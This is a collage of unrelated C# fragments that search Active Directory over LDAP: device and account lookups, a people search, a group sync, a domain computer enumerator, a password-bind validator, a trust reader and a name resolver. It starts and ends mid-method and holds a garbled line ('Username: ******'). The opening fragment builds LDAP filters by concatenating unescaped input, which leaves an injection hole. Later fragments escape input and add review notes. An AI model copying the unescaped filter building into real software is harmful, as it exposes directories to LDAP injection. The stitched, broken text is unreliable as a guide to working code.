Account { DirectorySearcher visitorDS = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); visitorDS.Filter = "(&((&(objectCategory=Person)))(CN=" + pantherID + "))"; SearchResult visitorSR = visitorDS.FindOne(); if (visitorSR != null) { ResultPropertyCollection visitorResult = visitorSR.Properties; foreach (string myKey in visitorResult.PropertyNames) { visitorOutput += myKey + " = "; foreach (Object myCollection in visitorResult[myKey]) { visitorOutput += myCollection + " "; } visitorOutput += Environment.NewLine; } try { output += "Username: "******"samaccountname"][0].ToString() + Environment.NewLine; } catch { output += "" + Environment.NewLine; } output += "-----------------------" + Environment.NewLine; try { output += "Description: " + visitorSR.Properties["fiuNSSEdescription"][0].ToString() + Environment.NewLine; } catch { output += ""; } try { output += "Email: " + visitorSR.Properties["fiunsseowner"][0].ToString() + Environment.NewLine + Environment.NewLine; } catch (Exception) { output += ""; } output += "Extra Information" + Environment.NewLine + "-----------------------" + Environment.NewLine; output += "Registered on: " + DateTime.FromFileTime((long)visitorSR.Properties["pwdLastSet"][0]).ToString() + Environment.NewLine; output += "Expires: " + DateTime.FromFileTime((long)visitorSR.Properties["accountExpires"][0]).ToString() + Environment.NewLine; } else { } } else if (fiuUsername.Length == 17 || fiuUsername.Length == 12) // MAC Registration { String macColon = "", macDash = "", macNone = ""; if (fiuUsername.Contains(":")) { macColon = fiuUsername; macDash = fiuUsername.Replace(":", "-"); macNone = fiuUsername.Replace(":", ""); } else if (fiuUsername.Contains("-")) { macColon = fiuUsername.Replace("-", ":"); macDash = fiuUsername; macNone = fiuUsername.Replace("-", ""); } else { macColon = fiuUsername.Substring(0, 2) + ":" + fiuUsername.Substring(2, 2) + ":" + fiuUsername.Substring(4, 2) + ":" + fiuUsername.Substring(6, 2) + ":" + 
fiuUsername.Substring(8, 2) + ":" + fiuUsername.Substring(10, 2); macDash = fiuUsername.Substring(0, 2) + "-" + fiuUsername.Substring(2, 2) + "-" + fiuUsername.Substring(4, 2) + "-" + fiuUsername.Substring(6, 2) + "-" + fiuUsername.Substring(8, 2) + "-" + fiuUsername.Substring(10, 2); macNone = fiuUsername; } resultBox.Text = output; DirectorySearcher dsColon = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); dsColon.Filter = "(&((&(objectCategory=Person)))(CN=" + macColon + "))"; SearchResult srColon = dsColon.FindOne(); if (srColon != null) { ResultPropertyCollection macResult = srColon.Properties; foreach (string myKey in macResult.PropertyNames) { macOutput += myKey + " = "; foreach (Object myCollection in macResult[myKey]) { macOutput += myCollection + " "; } macOutput += Environment.NewLine; } output += "Registration Information\n-----------------------\n"; try { output += "Device \"Name\": " + srColon.Properties["fiuNSSEdescription"][0] + "\n"; } catch (Exception) { output += "Device \"Name\": N/A\n"; } try { output += "Device MAC Address: " + srColon.Properties["GivenName"][0] + "\n"; } catch (Exception) { } output += "Registered to: " + srColon.Properties["fiuNSSEowner"][0] + "\n\n"; output += "Extra Information\n-----------------------\n"; output += "Registered on: " + DateTime.FromFileTime((long)srColon.Properties["pwdLastSet"][0]).ToString() + "\n"; output += "Registration Expires on: " + DateTime.FromFileTime((long)srColon.Properties["accountExpires"][0]).ToString() + "\n\n"; resultBox.Text = output; } DirectorySearcher dsDash = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); dsDash.Filter = "(&((&(objectCategory=Person)))(CN=" + macDash + "))"; SearchResult srDash = dsDash.FindOne(); if (srDash != null) { ResultPropertyCollection macResult = srDash.Properties; foreach (string myKey in macResult.PropertyNames) { macOutput += myKey + " = "; foreach (Object myCollection in macResult[myKey]) { macOutput += myCollection + " "; } 
macOutput += Environment.NewLine; } output += "Registration Information\n-----------------------\n"; output += "Device \"Name\": " + srDash.Properties["fiuNSSEdescription"][0] + "\n"; output += "Device MAC Address: " + srDash.Properties["GivenName"][0] + "\n"; output += "Registered to: " + srDash.Properties["fiuNSSEowner"][0] + "\n\n"; output += "Extra Information\n-----------------------\n"; output += "Registered on: " + DateTime.FromFileTime((long)srDash.Properties["pwdLastSet"][0]).ToString() + "\n"; output += "Registration Expires on: " + DateTime.FromFileTime((long)srDash.Properties["accountExpires"][0]).ToString() + "\n\n"; resultBox.Text = output; } DirectorySearcher dsNone = new DirectorySearcher(new DirectoryEntry(/*LDAP HERE*/))); dsNone.Filter = "(&((&(objectCategory=Person)))(CN=" + macNone + "))"; SearchResult srNone = dsNone.FindOne(); if (srNone != null) { ResultPropertyCollection macResult = srNone.Properties; foreach (string myKey in macResult.PropertyNames) { macOutput += myKey + " = "; foreach (Object myCollection in macResult[myKey]) { macOutput += myCollection + " "; } macOutput += Environment.NewLine; } output += "Registration Information\n-----------------------\n"; output += "Device \"Name\": " + srNone.Properties["fiuNSSEdescription"][0] + "\n"; output += "Device MAC Address: " + srNone.Properties["GivenName"][0] + "\n"; output += "Registered to: " + srNone.Properties["fiuNSSEowner"][0] + "\n\n"; output += "Extra Information\n-----------------------\n"; output += "Registered on: " + DateTime.FromFileTime((long)srNone.Properties["pwdLastSet"][0]).ToString() + "\n"; output += "Registration Expires on: " + DateTime.FromFileTime((long)srNone.Properties["accountExpires"][0]).ToString() + "\n\n"; } } else { output += "No Results Found For " + pantherID + " " + fiuUsername; } resultBox.Text = output; if (exportLogFileToolStripMenuItem.Checked == true) { using (System.IO.StreamWriter writer = new 
System.IO.StreamWriter(Environment.GetFolderPath(System.Environment.SpecialFolder.Personal))) { writer.WriteLine(emplOutput + Environment.NewLine + studentOutput + Environment.NewLine + visitorOutput + Environment.NewLine + macOutput); } } }
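/// <summary>
/// Searches the directory for enabled user accounts matching each ';'-separated term of
/// <paramref name="inputUserSearch"/>, running the queries while impersonating the current
/// web request's Windows identity.
/// </summary>
/// <remarks>
/// Each term is first matched by ambiguous name resolution (anr) as a prefix; when that
/// finds nothing, the sAMAccountName is matched as a prefix, using only the part before '@'
/// when the term looks like an e-mail address. Terms are escaped before they are placed in
/// the filter, so characters such as '*', '(' and ')' typed by the user are matched literally
/// and cannot alter the query.
/// </remarks>
/// <param name="inputUserSearch">One or more search terms separated by ';'.</param>
/// <returns>
/// Matching people ordered by SAMAccountName. On an error the exception message is logged
/// and the entries collected so far are returned (unsorted).
/// </returns>
public List<Person> GetPeople(string inputUserSearch)
{
    string[] userstofind = inputUserSearch.Split(';').Select(sValue => sValue.Trim()).ToArray();
    DirectoryEntry ldapConnection = createDirectoryEntry();
    DirectorySearcher ldap_searcher = new DirectorySearcher(ldapConnection);
    WindowsIdentity winId = (WindowsIdentity)HttpContext.Current.User.Identity;
    WindowsImpersonationContext impersonationContext = null;
    var UserList = new List<Person>();
    try
    {
        foreach (string user in userstofind)
        {
            if (string.IsNullOrEmpty(user))
            {
                continue;
            }

            // CR/LF are flattened so a search term cannot forge additional log lines.
            log.Info("" + winId.Name + " is searching for: " + SingleLineForLog(user) + "");

            // Impersonate once. Impersonating again on every term stacked contexts of which
            // only the last one was ever undone.
            if (impersonationContext == null)
            {
                impersonationContext = WindowsIdentity.Impersonate(winId.Token);
            }

            // properties to get
            ldap_searcher.PropertiesToLoad.Clear();
            ldap_searcher.PropertiesToLoad.Add("sAMAccountName");
            ldap_searcher.PropertiesToLoad.Add("title");
            ldap_searcher.PropertiesToLoad.Add("cn");
            ldap_searcher.PropertiesToLoad.Add("department");
            ldap_searcher.PropertiesToLoad.Add("distinguishedName");
            ldap_searcher.PropertiesToLoad.Add("mail");
            ldap_searcher.PropertiesToLoad.Add("thumbnailPhoto");
            ldap_searcher.PropertiesToLoad.Add("physicalDeliveryOfficeName");

            ldap_searcher.Filter = "(&(anr=" + EscapeLdapFilterValue(user) + "*)(samAccountType=805306368)(!userAccountControl:1.2.840.113556.1.4.803:=2))";

            SearchResultCollection allemployee_results = ldap_searcher.FindAll();
            try
            {
                if (allemployee_results.Count == 0)
                {
                    // Fall back to the account name; for "name@domain" only "name" is used.
                    // Split('@')[0] returns the whole term when it contains no '@'.
                    string accountName = user.Split('@')[0];
                    ldap_searcher.Filter = "(&(sAMAccountName=" + EscapeLdapFilterValue(accountName) + "*)(samAccountType=805306368)(!userAccountControl:1.2.840.113556.1.4.803:=2))";

                    allemployee_results.Dispose();
                    allemployee_results = ldap_searcher.FindAll();
                }

                foreach (SearchResult employeeEntryToGet in allemployee_results)
                {
                    bool hasPhoto = employeeEntryToGet.Properties.Contains("thumbnailPhoto")
                        && employeeEntryToGet.Properties["thumbnailPhoto"] != null;

                    UserList.Add(new Person
                    {
                        SAMAccountName = FirstValueOrEmpty(employeeEntryToGet, "sAMAccountName"),
                        Title = FirstValueOrEmpty(employeeEntryToGet, "title"),
                        Department = FirstValueOrEmpty(employeeEntryToGet, "department"),
                        EmailAddress = FirstValueOrEmpty(employeeEntryToGet, "mail"),
                        Office = FirstValueOrEmpty(employeeEntryToGet, "physicalDeliveryOfficeName"),
                        DistinguishedName = FirstValueOrEmpty(employeeEntryToGet, "distinguishedName"),
                        FullName = FirstValueOrEmpty(employeeEntryToGet, "cn"),
                        HasPhoto = hasPhoto ? "Yes" : "No"
                    });
                }
            }
            finally
            {
                allemployee_results.Dispose();
            }
        }

        UserList = UserList.OrderBy(newlist => newlist.SAMAccountName).ToList();
    }
    catch (Exception ex)
    {
        log.Info("" + winId.Name + " has encountered an error: " + ex.Message + "");
    }
    finally
    {
        // Drop the impersonated identity before anything else, so cleanup runs as the process identity.
        if (impersonationContext != null)
        {
            impersonationContext.Undo();
            impersonationContext.Dispose();
        }
        ldap_searcher.Dispose();
        ldapConnection.Dispose();
        // NOTE(review): winId belongs to the current request (HttpContext.Current.User); disposing
        // it here may affect code that runs later in the same request - confirm this is intended.
        winId.Dispose();
    }
    return UserList;
}

// Escapes the characters that have a meaning inside an LDAP filter value (RFC 4515).
private static string EscapeLdapFilterValue(string value)
{
    // The backslash is replaced first so the escapes added afterwards are not escaped again.
    return value
        .Replace("\\", "\\5c")
        .Replace("*", "\\2a")
        .Replace("(", "\\28")
        .Replace(")", "\\29")
        .Replace("\0", "\\00");
}

// Replaces line breaks with spaces so the value occupies a single log line.
private static string SingleLineForLog(string value)
{
    return value.Replace("\r", " ").Replace("\n", " ");
}

// Returns the first value of the attribute as text, or "" when the entry does not carry it.
private static string FirstValueOrEmpty(SearchResult entry, string attribute)
{
    if (!entry.Properties.Contains(attribute))
    {
        return "";
    }

    ResultPropertyValueCollection values = entry.Properties[attribute];
    return values != null && values.Count > 0 ? values[0].ToString() : "";
}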
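/// <summary>
/// Reads the groups to sync from the configured directory server.
/// </summary>
/// <remarks>
/// A first search uses the revision filter. When that filter differs from the base filter
/// and finds nothing, an empty list is returned; when it finds something, the groups are
/// re-read with the base filter. All users matching the user filter are read as well and
/// indexed so that each group can be built with its members.
/// The work is done synchronously; the returned task is already completed.
/// </remarks>
/// <param name="force">Passed to BuildRevisionFilter together with the last group sync date.</param>
/// <returns>A completed task holding the groups for which BuildGroup returned a value.</returns>
/// <exception cref="ApplicationException">
/// Sync or directory server settings are missing, group sync is switched off, or the
/// session is not authenticated.
/// </exception>
private static Task<List<GroupEntry>> GetGroupsAsync(bool force = false)
{
    // The null check has to come before Sync.SyncGroups is read; in the previous order a
    // missing sync configuration surfaced as a NullReferenceException.
    if (SettingsService.Instance.Sync == null)
    {
        throw new ApplicationException("No configuration for sync.");
    }

    if (!SettingsService.Instance.Sync.SyncGroups)
    {
        throw new ApplicationException("Not configured to sync groups.");
    }

    if (SettingsService.Instance.Server?.Ldap == null)
    {
        throw new ApplicationException("No configuration for directory server.");
    }

    if (!AuthService.Instance.Authenticated)
    {
        throw new ApplicationException("Not authenticated.");
    }

    var groupEntry = SettingsService.Instance.Server.Ldap.GetGroupDirectoryEntry();

    var originalFilter = BuildBaseFilter(SettingsService.Instance.Sync.Ldap.GroupObjectClass,
        SettingsService.Instance.Sync.GroupFilter);

    var revisionFilter = BuildRevisionFilter(originalFilter, force, SettingsService.Instance.LastGroupSyncDate);
    var searchSinceRevision = originalFilter != revisionFilter;
    var filter = revisionFilter;

    Console.WriteLine("Group search: {0} => {1}", groupEntry.Path, filter);

    DirectorySearcher searcher = null;
    SearchResultCollection result = null;
    DirectorySearcher userSearcher = null;
    SearchResultCollection userResult = null;
    try
    {
        searcher = new DirectorySearcher(groupEntry, filter);
        result = searcher.FindAll();

        var initialSearchGroupIds = new List<string>();
        foreach (SearchResult item in result)
        {
            initialSearchGroupIds.Add(DNFromPath(item.Path));
        }

        if (searchSinceRevision && !initialSearchGroupIds.Any())
        {
            // Nothing changed since the last sync.
            return Task.FromResult(new List<GroupEntry>());
        }

        if (searchSinceRevision)
        {
            // Something changed: release the first search and read the groups with the base filter.
            result.Dispose();
            searcher.Dispose();
            searcher = new DirectorySearcher(groupEntry, originalFilter);
            result = searcher.FindAll();
        }

        var userEntry = SettingsService.Instance.Server.Ldap.GetUserDirectoryEntry();
        var userFilter = BuildBaseFilter(SettingsService.Instance.Sync.Ldap.UserObjectClass,
            SettingsService.Instance.Sync.UserFilter);
        userSearcher = new DirectorySearcher(userEntry, userFilter);
        userResult = userSearcher.FindAll();

        var userIdsDict = MakeIdIndex(userResult);

        var groups = new List<GroupEntry>();
        foreach (SearchResult item in result)
        {
            var group = BuildGroup(item, userIdsDict);
            if (group == null)
            {
                continue;
            }

            groups.Add(group);
        }

        return Task.FromResult(groups);
    }
    finally
    {
        // Searchers and result collections created here are released on every path.
        // NOTE(review): groupEntry / userEntry come from the settings helpers; whether this
        // method owns them is not visible here, so they are left untouched.
        userResult?.Dispose();
        userSearcher?.Dispose();
        result?.Dispose();
        searcher?.Dispose();
    }
}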
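/// <summary>
/// Returns the upper-cased dnshostname values of the computer objects selected by a
/// predefined query.
/// </summary>
/// <param name="ldap">
/// Query name: "all", "dc", "exclude-dc", "servers" or "servers-exclude-dc". Any other value
/// prints the usage text and ends the process. The two "servers" queries run against the
/// current domain because operatingSystem is not replicated to the Global Catalog; the
/// others run against the Global Catalog.
/// </param>
/// <param name="verbose">When true, error messages are written to the console.</param>
/// <returns>
/// The host names found, without entries that contain the local machine name; an empty list
/// when the search itself failed; null when an unexpected error occurred.
/// </returns>
public static List<string> SearchLDAP(string ldap, bool verbose)
{
    try
    {
        bool searchGlobalCatalog = true;
        List<string> ComputerNames = new List<string>();
        string description = null;
        string filter = null;

        //https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx
        //https://ldapwiki.com/wiki/Active%20Directory%20Computer%20Related%20LDAP%20Query
        switch (ldap)
        {
            case "all":
                // NOTE(review): the description mentions the "Domain Computers" primary group,
                // but the filter only selects enabled computer objects.
                description = "all enabled computers with \"primary\" group \"Domain Computers\"";
                filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))");
                break;
            case "dc":
                description = "all enabled Domain Controllers (not read-only DCs)";
                filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(userAccountControl:1.2.840.113556.1.4.803:=8192))");
                break;
            case "exclude-dc":
                description = "all enabled computers that are not Domain Controllers or read-only DCs";
                filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))");
                break;
            case "servers":
                searchGlobalCatalog = false; //operatingSystem attribute is not replicated in Global Catalog
                description = "all enabled servers";
                filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*))");
                break;
            case "servers-exclude-dc":
                searchGlobalCatalog = false; //operatingSystem attribute is not replicated in Global Catalog
                description = "all enabled servers excluding Domain Controllers or read-only DCs";
                filter = ("(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2.840.113556.1.4.803:=8192))(!(userAccountControl:1.2.840.113556.1.4.803:=67100867)))");
                break;
            default:
                // Report the value that was rejected; 'filter' is still null at this point.
                Console.WriteLine("[!] Invalid LDAP filter: {0}", ldap);
                Utilities.Options.Usage();
                Environment.Exit(0);
                break;
        }

        if (searchGlobalCatalog)
        {
            try
            {
                using (Forest currentForest = Forest.GetCurrentForest())
                using (GlobalCatalog globalCatalog = currentForest.FindGlobalCatalog())
                using (DirectorySearcher globalCatalogSearcher = globalCatalog.GetDirectorySearcher())
                {
                    Console.WriteLine("[+] Performing LDAP query against Global Catalog for {0}...", description);
                    Console.WriteLine("[+] This may take some time depending on the size of the environment");
                    CollectDnsHostNames(globalCatalogSearcher, filter, ComputerNames);
                }
            }
            catch (Exception ex)
            {
                if (verbose)
                {
                    Console.WriteLine("[!] LDAP Error searching Global Catalog: {0}", ex.Message);
                }
            }
        }
        else
        {
            try
            {
                using (DirectoryEntry entry = new DirectoryEntry())
                using (DirectorySearcher mySearcher = new DirectorySearcher(entry))
                {
                    Console.WriteLine("[+] Performing LDAP query against the current domain for {0}...", description);
                    Console.WriteLine("[+] This may take some time depending on the size of the environment");
                    CollectDnsHostNames(mySearcher, filter, ComputerNames);
                }
            }
            catch (Exception ex)
            {
                if (verbose)
                {
                    Console.WriteLine("[!] LDAP Error: {0}", ex.Message);
                }
            }
        }

        //localhost returns false positives
        // NOTE(review): this is a substring match, so a host whose name merely contains the
        // local machine name is dropped as well - confirm that is acceptable.
        string localName = System.Environment.MachineName.ToUpperInvariant();
        ComputerNames.RemoveAll(u => u.Contains(localName));

        Console.WriteLine("[+] LDAP Search Results: {0}", ComputerNames.Count.ToString());
        return ComputerNames;
    }
    catch (Exception ex)
    {
        if (verbose)
        {
            Console.WriteLine("[!] LDAP Error: {0}", ex.Message);
        }
        return null;
    }
}

// Runs the filter on the given searcher and appends every dnshostname value, upper-cased, to names.
private static void CollectDnsHostNames(DirectorySearcher searcher, string filter, List<string> names)
{
    searcher.PropertiesToLoad.Add("dnshostname");
    searcher.Filter = filter;
    searcher.SizeLimit = int.MaxValue;
    searcher.PageSize = int.MaxValue;

    using (SearchResultCollection results = searcher.FindAll())
    {
        foreach (SearchResult resEnt in results)
        {
            // Objects without a dnshostname are skipped (checked up front instead of
            // catching the exception the indexer would raise).
            ResultPropertyValueCollection values = resEnt.Properties["dnshostname"];
            if (values == null || values.Count == 0)
            {
                continue;
            }

            // Invariant casing: host names must not depend on the current UI culture.
            names.Add(values[0].ToString().ToUpperInvariant());
        }
    }
}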
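/// <summary>
/// Searches the connected server for computer objects and resolves each hit to a
/// <see cref="ComputerPrincipalFull"/>.
/// </summary>
/// <param name="maxRecords">
/// Maximum number of search results to process. Zero or a negative value means no cap.
/// </param>
/// <returns>
/// The principals that could be resolved. A result whose lookup throws is skipped, so the
/// list may hold fewer entries than the directory returned.
/// </returns>
/// <exception cref="NotSupportedException">The context is not a Domain context.</exception>
public List<ComputerPrincipalFull> GetChildComputerObjects(int maxRecords)
{
    if (ContextType != ContextType.Domain)
    {
        throw new NotSupportedException(
            "This functionality is only available for Domain ContextType PrincipalContext objects.");
    }

    var children = new List<ComputerPrincipalFull>();

    // The entry, the searcher and the result collection all wrap native ADSI handles;
    // dispose them deterministically instead of waiting for finalization.
    using (var directoryDe = new DirectoryEntry(string.Format("LDAP://{0}", ConnectedServer)))
    using (var search = new DirectorySearcher(directoryDe)
    {
        Tombstone = false,
        Asynchronous = true,
        PageSize = 100,
        Filter = "(objectClass=computer)"
    })
    using (SearchResultCollection results = search.FindAll())
    {
        var processed = 0;
        foreach (SearchResult result in results)
        {
            processed++;
            if (maxRecords > 0 && processed > maxRecords)
            {
                break;
            }

            // The distinguished name is taken as the last '/'-separated segment of the ADsPath.
            // NOTE(review): a DN that itself contains an escaped '/' would be cut short here - confirm.
            string[] pieces = result.Path.Split('/');
            string dn = pieces[pieces.Length - 1];

            try
            {
                children.Add(ComputerPrincipalFull.FindByIdentity(this, IdentityType.DistinguishedName, dn));
            }
            catch
            {
                // Deliberate best-effort: an object that cannot be resolved is left out of the list.
                // NOTE(review): access-denied and transport errors are hidden here as well;
                // consider logging so a partial list can be told apart from a complete one.
            }
        }
    }

    return children;
}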
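/// <summary>
/// Validates a user name and password: looks the account up by sAMAccountName, then
/// attempts a directory bind to <paramref name="dominio"/> with the supplied credentials.
/// </summary>
/// <param name="usuario">Account name (sAMAccountName) to validate.</param>
/// <param name="clave">Password for the account.</param>
/// <param name="dominio">Domain or server name used to build the "LDAP://" bind path.</param>
/// <returns>
/// "OK" when the account was found and the bind succeeded; "ER" when no account matched or
/// when the user name or password is blank; otherwise the message of the exception raised
/// by the bind attempt.
/// </returns>
public string validarUsuario(string usuario, string clave, string dominio)
{
    string rpta = "";

    // Never attempt a bind with a blank user name or password: depending on the bind type,
    // a directory server can accept it as an anonymous/unauthenticated bind, which would
    // then be reported as "OK".
    if (string.IsNullOrEmpty(usuario) || string.IsNullOrEmpty(clave))
    {
        return "ER";
    }

    // The lookup runs against the default search root; dominio is only used for the
    // credential bind further down.
    // NOTE(review): confirm whether the lookup should be rooted at dominio as well.
    using (DirectorySearcher Searcher = new DirectorySearcher())
    {
        // usuario is caller-supplied: escape it so characters such as '*', '(' and ')'
        // cannot alter the structure of the filter (LDAP filter injection).
        Searcher.Filter = "(SAMAccountName=" + EscapeLdapFilterValue(usuario) + ")"; // match one specific account
        Searcher.SearchScope = SearchScope.Subtree;            // whole subtree below the search root
        Searcher.PropertiesToLoad.Add("sAMAccountName");       // user id
        Searcher.PropertiesToLoad.Add("displayName");          // display name
        Searcher.PropertiesToLoad.Add("givenName");            // first name
        Searcher.PropertiesToLoad.Add("sn");                   // last name
        Searcher.PropertiesToLoad.Add("distinguishedName");    // distinguished name
        Searcher.PropertiesToLoad.Add("proxyAddresses");       // e-mail addresses
        Searcher.PropertiesToLoad.Add("department");           // department
        Searcher.PropertiesToLoad.Add("title");                // job title / role
        Searcher.PropertiesToLoad.Add("userAccountControl");   // account control flags
        Searcher.Sort.PropertyName = "sAMAccountName";
        Searcher.Sort.Direction = System.DirectoryServices.SortDirection.Ascending;

        using (var users = Searcher.FindAll())
        {
            if (users.Count > 0)
            {
                foreach (SearchResult User in users)
                {
                    // The password check itself: bind with the supplied credentials and force a
                    // round trip to the server. The entry holds the clear-text password, so
                    // release it as soon as the check is done.
                    using (System.DirectoryServices.DirectoryEntry Entry =
                               new System.DirectoryServices.DirectoryEntry("LDAP://" + dominio, usuario, clave))
                    using (System.DirectoryServices.DirectorySearcher valSearcher =
                               new System.DirectoryServices.DirectorySearcher(Entry))
                    {
                        valSearcher.SearchScope = System.DirectoryServices.SearchScope.OneLevel;
                        try
                        {
                            valSearcher.FindOne();
                        }
                        catch (Exception ex)
                        {
                            // NOTE(review): the raw provider message goes back to the caller; check
                            // that it is not shown verbatim to the person logging in.
                            rpta = ex.Message;
                            return (rpta);
                        }
                    }

                    rpta = "OK";
                }
            }
            else
            {
                rpta = "ER";
            }
        }
    }

    return (rpta);
}

/// <summary>
/// Escapes a value for use as an assertion value inside an LDAP search filter (RFC 4515),
/// so that it is always matched literally.
/// </summary>
private static string EscapeLdapFilterValue(string value)
{
    var escaped = new System.Text.StringBuilder(value.Length + 8);
    foreach (char c in value)
    {
        switch (c)
        {
            case '\\': escaped.Append(@"\5c"); break;
            case '*': escaped.Append(@"\2a"); break;
            case '(': escaped.Append(@"\28"); break;
            case ')': escaped.Append(@"\29"); break;
            case '\0': escaped.Append(@"\00"); break;
            default: escaped.Append(c); break;
        }
    }
    return escaped.ToString();
}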
/// <summary>
/// Returns the trust relationships of the domain <c>dName</c>, reading the trustedDomain
/// objects under CN=System of the default naming context on first use and caching the
/// result in <c>trustCollection</c>.
/// </summary>
/// <returns>
/// The cached collection. Null when the default naming context is empty, when the search
/// finds no trustedDomain objects (the cache stays null, so the next call queries again),
/// or when any exception is thrown while reading the directory.
/// </returns>
public TrustRelationshipInformationCollection GetAllTrustRelationships()
{
    if (trustCollection == null)
    {
        try
        {
            // Every bind in this method uses the stored dc.UserName / dc.Password credentials.
            DirectoryEntry rootDse = new DirectoryEntry(string.Format("LDAP://{0}/RootDSE", dName), dc.UserName, dc.Password);
            string defaultName = rootDse.DirContext.DefaultNamingContext;
            if (defaultName == null || defaultName == "")
            {
                trustCollection = null;
                return trustCollection;
            }
            DirectoryEntry sys = new DirectoryEntry(string.Format("LDAP://{0}/CN=System,{1}", SDSUtils.DNToDomainName(defaultName), defaultName), dc.UserName, dc.Password);
            DirectorySearcher ds = new DirectorySearcher(sys);
            ds.Filter = "(objectClass=trustedDomain)";
            ds.SearchScope = SearchScope.Subtree;
            SearchResultCollection src = ds.FindAll();
            if (src != null && src.Count > 0)
            {
                trustCollection = new TrustRelationshipInformationCollection();
                foreach (SearchResult sr in src)
                {
                    // The cracked path components are not used further in this method.
                    string sProtocol, sServer, sCNs, sDCs;
                    SDSUtils.CrackPath(sr.Path, out sProtocol, out sServer, out sCNs, out sDCs);
                    string sourcename, targetname;
                    TrustDirection trustdirection;
                    TrustType trusttype = TrustType.Unknown;
                    DirectoryEntry trustEntry = new DirectoryEntry(sr.Path, dc.UserName, dc.Password);
                    int trustdir = (int)trustEntry.Properties["trustDirection"].Value;
                    string trustDn = trustEntry.Properties["distinguishedName"].Value.ToString();
                    // Keep only the value of the first RDN: drop its three-character prefix (presumably "CN=").
                    string[] splits = trustDn.Split(',');
                    trustDn = splits[0].Substring(3);
                    int trustattr = (int)trustEntry.Properties["trustAttributes"].Value;
                    int trusttp = (int)trustEntry.Properties["trustType"].Value;
                    // Note: how the TrustType is derived below is still under investigation.
                    // NOTE(review): the case labels are single flag values; if trustAttributes carries
                    // several flags at once the value matches no label and the trust is reported as
                    // Unknown - confirm against the attribute definition before relying on the result
                    // for a security decision.
                    if (trusttp == (int)ADTrustType.TYPE_UPLEVEL) // Windows 2003 trust
                    {
                        switch (trustattr)
                        {
                            case 0:
                                trusttype = TrustType.External; // this trust is non-transitive
                                break;
                            case 1: // ATTRIBUTES_NON_TRANSITIVE - no type assigned, stays Unknown
                                break;
                            case 2: // ATTRIBUTES_UPLEVEL_ONLY - no type assigned, stays Unknown
                                break;
                            case 4: // ATTRIBUTES_QUARANTINED_DOMAIN
                                trusttype = TrustType.External;
                                break;
                            case 8: // ATTRIBUTES_FOREST_TRANSITIVE
                                trusttype = TrustType.Forest; // and this trust is transitive
                                break;
                            case 16: // ATTRIBUTES_CROSS_ORGANIZATION
                                trusttype = TrustType.CrossLink;
                                break;
                            case 32: // ATTRIBUTES_WITHIN_FOREST
                                // Substring test: a trusted name that contains dName is treated as parent/child.
                                if (trustDn.ToLower().Contains(dName.ToLower()))
                                    trusttype = TrustType.ParentChild;
                                else
                                    trusttype = TrustType.External; // this trust is non-transitive
                                break;
                            case 64: // ATTRIBUTES_TREAT_AS_EXTERNAL
                                trusttype = TrustType.External;
                                break;
                            default:
                                trusttype = TrustType.Unknown;
                                break;
                        }
                    }
                    else if (trusttp == (int)ADTrustType.TYPE_MIT)
                        trusttype = TrustType.Kerberos;
                    // trustDirection: 1 = inbound, 2 = outbound, 3 = both; anything else is reported as Disabled.
                    switch (trustdir)
                    {
                        case 1:
                            trustdirection = TrustDirection.Inbound;
                            sourcename = dName;
                            targetname = trustDn;
                            break;
                        case 2:
                            trustdirection = TrustDirection.Outbound;
                            sourcename = trustDn;
                            targetname = dName;
                            break;
                        case 3:
                            trustdirection = TrustDirection.Bidirectional;
                            sourcename = dName;
                            targetname = trustDn;
                            break;
                        default:
                            trustdirection = TrustDirection.Disabled;
                            sourcename = targetname = "";
                            break;
                    }
                    TrustRelationshipInformation trustinfo = new TrustRelationshipInformation(sourcename, targetname, trusttype, trustdirection);
                    trustCollection.Add(trustinfo);
                }
            }
        }
        catch
        {
            // Any failure (bind, authentication, missing attribute, bad cast) ends up here.
            // NOTE(review): the caller cannot tell "no trusts" from "lookup failed", and a failure
            // part-way through the loop leaves a partially filled trustCollection cached for later calls.
            return null;
        }
    }
    return trustCollection;
}
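/// <summary>
/// Resolves a typed name to a directory object: first by exact match on displayName,
/// sAMAccountName, userPrincipalName or objectSid, then by substring match, and finally
/// as a Windows account name through <see cref="NTAccount"/>.
/// </summary>
/// <param name="name">Name as entered; surrounding white space is ignored.</param>
/// <returns>
/// An <see cref="ADObject"/> whose state is Resolved (exactly one match, or a translatable
/// account name), NotFound, or Multiple (the candidates are stored in
/// Session["proposedADObjects"]). If an exception occurs after the first search, the object
/// is returned in whatever state it had reached.
/// </returns>
private ADObject resolveName(string name)
{
    name = name.Trim();

    // The name comes from user input and is placed inside LDAP filters below. Escape it so
    // that parentheses, asterisks and backslashes are matched literally and cannot change
    // the structure of the filter.
    string filterValue = EscapeFilterValue(name);

    using (DirectoryEntry root = Utility.NewDirectoryEntry("LDAP://" + SqlAzManStorage.RootDSEPath))
    using (DirectorySearcher deSearch = new DirectorySearcher(root))
    {
        bool usersOnly = this.adObjectType == ADObjectType.UsersOnly || this.adObjectType == ADObjectType.OneUserOnly;
        bool usersAndGroups = this.adObjectType == ADObjectType.UsersAndGroups;

        // Pass 1: exact match.
        if (usersOnly)
        {
            deSearch.Filter = String.Format("(&(|(displayName={0})(samaccountname={0})(userprincipalname={0})(objectSid={0}))(&(objectClass=user)(objectCategory=person)))", filterValue);
        }
        else if (usersAndGroups)
        {
            deSearch.Filter = String.Format("(&(|(displayName={0})(samaccountname={0})(userprincipalname={0})(objectSid={0}))(|(&(objectClass=user)(objectCategory=person))(objectClass=group)))", filterValue);
        }

        SearchResultCollection results = deSearch.FindAll();
        ADObject ado = new ADObject();
        try
        {
            if (results.Count == 1)
            {
                using (DirectoryEntry de = results[0].GetDirectoryEntry())
                {
                    ado.Name = (string)de.InvokeGet("samaccountname");
                    ado.ADSPath = de.Path;
                    ado.UPN = (string)de.InvokeGet("userPrincipalName");
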